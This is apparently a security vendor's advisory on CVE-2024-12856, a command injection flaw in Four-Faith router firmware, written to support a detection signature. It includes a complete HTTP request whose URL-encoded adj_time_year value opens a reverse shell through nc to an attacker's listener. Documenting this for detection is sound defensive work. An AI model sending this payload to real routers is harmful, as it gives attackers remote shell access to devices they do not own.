top of page

Four-Faith - 'adj_time_year' Remote Command Injection (CVE-2024-12856)



Application Details

Four-Faith routers are IoT wireless communication devices.


Vulnerability

The Four-Faith router models F3x24 and F3x36 could potentially be affected by an operating system (OS) command injection vulnerability.


Identification

At least firmware v2.0 allows authenticated and remote attackers to execute arbitrary OS commands over HTTP, by modifying the device’s system time via submit_type=adjust_sys_time., using the / apply.cgi endpoint.

POST /apply.cgi

adj_time_sec=32&change_action=gozila_cgi&adj_time_day=27&adj_time_mon=10&adj_time_hour=11&adj_time_year=%24%28cd+%2Ftmp%2F%3B+mknod+bOY+p%3Bcat+bOY%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.1.206+1270+%3EbOY%3B+rm+bOY%3B%29&adj_time_min=35&submit_button=index&action=Save&submit_type=adjust_sys_time

Detection

By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary OS commands on the system.


Coverage

Idappcom have created signature 8025573 along with a traffic file for this vulnerability.


References


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional

Comments


bottom of page